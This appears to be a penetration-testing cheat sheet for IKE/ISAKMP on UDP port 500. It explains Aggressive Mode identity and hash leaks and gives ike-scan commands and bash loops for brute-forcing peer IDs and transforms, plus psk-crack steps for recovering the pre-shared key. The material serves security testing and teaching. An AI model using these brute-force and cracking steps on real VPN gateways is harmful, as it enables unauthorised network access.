Notes
| Alternative Ports |
|---|
| 4500 (NAT-T) |
Service Description
UDP port 500 is used by ISAKMP (Internet Security Association and Key Management Protocol), commonly seen with IKE (Internet Key Exchange) as part of IPSec VPNs. It negotiates Security Associations (SAs), handles authentication and cryptographic key exchange. This is typically the first point of interaction in VPN setups, and is a target for identifying VPN gateways, user identities, and misconfigurations.
Remember
To abuse Aggressive Mode you need to find both a valid ID and transform set to elicit the PSK.
Attacks
Aggressive Mode Identity Leak
When IKEv1 is configured in Aggressive Mode, the responder may leak the peer ID and hashed pre-shared key, allowing offline dictionary attacks.
Brute-force of Peer ID and PSK
If the peer ID is guessable and Aggressive Mode is enabled, attackers can brute-force both the ID and PSK to extract VPN access.
Vendor-Specific Behavior (e.g. Cisco)
Cisco devices often require both an exact match of peer ID and proposal before responding with a hash. Even in Aggressive Mode, many Cisco appliances will not return a hash without full parameter alignment.
Tools & Exploits
Enumeration
nmap
Initial probe to confirm IKE/ISAKMP service.
nmap -sU -p500 --script ike-version <target-ip>ike-scan
Performs IKE discovery, aggressive mode testing, ID brute-forcing, and hash capture.
# Basic discovery
ike-scan <target-ip>
# Aggressive Mode with known ID
ike-scan --aggressive --id=myid --pskcrack <target-ip>Brute-force ID Script
while read id; do
ike-scan --aggressive --id="$id" --pskcrack <target-ip>
done < idlist.txtTransform Brute-force Script
for trans in "1,2,1,1" "3,2,1,2" "5,2,1,2"; do
ike-scan --aggressive --id=validid --trans=$trans <target-ip>
donestrongSwan
Used to simulate or connect to VPN endpoints with known configuration.
apt install strongswan -yExploitation or Post-Enum
psk-crack
Cracks PSK from hash returned by ike-scan.
psk-crack psk-hash-output.txtVPN access (if PSK and ID valid)
Use strongSwan or OpenVPN with captured/guessed values.
Wireshark Analysis Tips
Filters
udp.port == 500
isakmp
ip.addr == <target-ip> && udp.port == 500What to look for:
- Exchange Type = 4 → Aggressive Mode
- SA and ID Payloads → in clear
- Notify: NO_PROPOSAL_CHOSEN means proposal rejected
- Valid hash return → transform and ID accepted
- Exchange Mode ID Data: Look for fields like
ID Type: FQDNandID Data: vpn.company.com
Transform ID Mapping
| Crypto Component | Wireshark ID | ike-scan ID |
|---|---|---|
| 3DES-CBC | 5 | 3 |
| AES-CBC | 7 | 5 |
| SHA1 | 2 | 2 |
| MD5 | 1 | 1 |
| PSK | 1 | 1 |
| MODP 768 | 1 | 1 |
| MODP 1024 | 2 | 2 |
| MODP 1536 | 5 | 5 |
Manual Transform Testing:
ike-scan --aggressive --id=your_id --trans=3,1,1,2 <target-ip> # MD5
ike-scan --aggressive --id=your_id --trans=5,2,1,2 <target-ip> # AES
ike-scan --aggressive --id=your_id --trans=3,2,1,1 <target-ip> # MODP768
ike-scan --aggressive --id=your_id --trans=3,2,1,5 <target-ip> # MODP1536Scripted Transform Brute-force:
#!/bin/bash
TARGET="$1"
ID="$2"
if [[ -z "$TARGET" || -z "$ID" ]]; then
echo "Usage: $0 <target-ip> <valid-id>"
exit 1
fi
transforms=(
"1,2,1,1"
"1,2,1,2"
"1,1,1,2"
"3,2,1,2"
"5,2,1,1"
"5,2,1,2"
"5,1,1,2"
"5,2,1,5"
)
for trans in "${transforms[@]}"; do
echo -e "\n[*] Trying transform: $trans"
ike-scan --aggressive --id="$ID" --trans="$trans" "$TARGET"
done